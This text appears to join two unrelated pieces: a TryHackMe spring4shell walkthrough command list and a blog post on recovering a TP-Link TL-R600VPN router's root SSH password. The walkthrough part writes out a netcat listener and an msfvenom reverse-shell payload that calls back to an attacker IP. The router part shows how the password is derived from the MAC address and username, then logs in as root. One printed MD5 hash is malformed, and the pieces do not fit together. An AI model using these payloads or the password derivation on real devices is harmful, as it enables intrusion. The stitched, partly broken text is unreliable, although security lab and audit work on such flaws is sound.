A walkthrough of the TryHackMe room spring4shell.
https://tryhackme.com/room/spring4shell
Commands used in this video:
nc -lvnp 80
python3 -m http.server 8000
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<tryhackme_vpn_ip> LPORT=80 -f elf > shell.elf
Ubuntu: /usr/share/tomcat8/bin/version.sh
Results:
Using CATALINA_BASE: /usr/share/tomcat8
Using CATALINA_HOME: /usr/share/tomcat8
Using CATALINA_TMPDIR: /usr/share/tomcat8/temp
Using JRE_HOME: /usr
Using CLASSPATH: /usr/share/tomcat8/bin/bootstrap.jar:/usr/share/tomcat8/bin/tomcat-juli.jar
NOTE: Picked up JDK_JAVA_OPTIONS: --add-opens=java.base/java.lang=ALL-UNNAMED --add-opens=java.base/java.io=ALL-UNNAMED --add-opens=java.rmi/sun.rmi.transport=ALL-UNNAMED
Server version: Apache Tomcat/8.5.39 (Ubuntu)
Server built: Sep 9 2019 19:47:51 UTC
Server number: 8.5.39.0
OS Name: Linux
OS Version: 4.15.0-112-generic
Architecture: amd64
JVM Version: 11.0.8+10-post-Ubuntu-0ubuntu118.04.1
JVM Vendor: Ubuntu
Amazon Linux (AL2): /usr/sbin/tomcat version
The tp-link TL-R600VPN is a nice low-cost NAT router.
While trying to add a long list of URLs from http://www.shallalist.de/ for URL filtering, I kept bumping into a limit of 25. So, I figured there must be a way to update the list from the command line.
Turning on SSH
There is not an option to turn on SSH. However, there is Remote Assistance (System Tools -> Diagnostics -> Remote Assistance).
After Remote Assistance is turned on, there is no obvious username and password to use for SSH access; this is something only support is supposed to use.
Finding password
Following this article gave me a great start on figuring out the SSH creds. The article references going to squashfs-root/etc/ and viewing the shadow file for the root password. In this case, the TL-R600VPN firmware did not contain the password there. Looking in the squashfs-root/etc/init.d folder did uncover startup scripts.
Enter Dropbear
The dropbear startup init script includes a section that generates a new password on startup.
getNewPasswd()
{
. /lib/functions.sh
local macAddr=""
local username=""
macAddr=$(uci_get tddp macaddr macaddr)
username=$(uci_get "accountmgnt.@account[0].username")
echo "macAddr is $macAddr" > /dev/console
#echo "username = $username" > /dev/console
local key=$(echo -n "$macAddr""$username" | md5sum)
key=$(echo ${key:0:16})
#echo "key is $key" > /dev/console
echo ${key}
}
Break it down
macAddr references the LAN MAC, found under Network -> MAC
example: D8:47:32:12:34:56
username references the user that was created during the setup process
example: administrator
local key puts the two pieces together and pipes them to md5sum:
echo -n "D8:47:32:12:34:56administrator" | md5sum
d53ffaa1f8b8ce3b62f6b60673800d0
key=$(echo ${key:0:16}) takes the hash and uses only its first 16 characters as the password: d53ffaa1f8b8ce3b
Now we have the password
SSH as root: ssh root@192.168.2.1
provide the password: d53ffaa1f8b8ce3b
Victory!
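To make the weakness concrete, here is an added example (not code from the firmware or from the original post) that reproduces the init script's derivation in plain POSIX shell, adds an audit helper that flags a device whose root password still equals the derivable value, and contrasts the scheme with a per-device random secret. It assumes md5sum and /dev/urandom are available; the function names are my own.

```shell
# Weak scheme as in the dropbear init script: md5(MAC || username),
# truncated to the first 16 hex characters. Both inputs are non-secret
# (the MAC is visible on the LAN, the username is chosen at setup), so the
# password is fully determined by values an attacker on the LAN can learn.
derive_dropbear_key() {
    mac="$1"
    user="$2"
    # printf instead of echo -n for portability across sh implementations
    key=$(printf '%s%s' "$mac" "$user" | md5sum | cut -c1-16)
    printf '%s' "$key"
}

# Audit helper for defenders: exit status 0 when the given password is the
# derivable one, i.e. the device still relies on the weak scheme and the
# root password should be rotated.
is_derived_password() {
    mac="$1"
    user="$2"
    password="$3"
    [ "$password" = "$(derive_dropbear_key "$mac" "$user")" ]
}

# Hardened alternative (assumption: /dev/urandom exists on the device):
# 8 random bytes rendered as 16 hex characters, not derivable from any
# device attribute, so each unit gets an unpredictable secret.
generate_random_key() {
    head -c 8 /dev/urandom | od -An -tx1 | tr -d ' \n'
}
```

Run is_derived_password with the LAN MAC, setup username and the current root password to check whether a unit is still using the predictable credential.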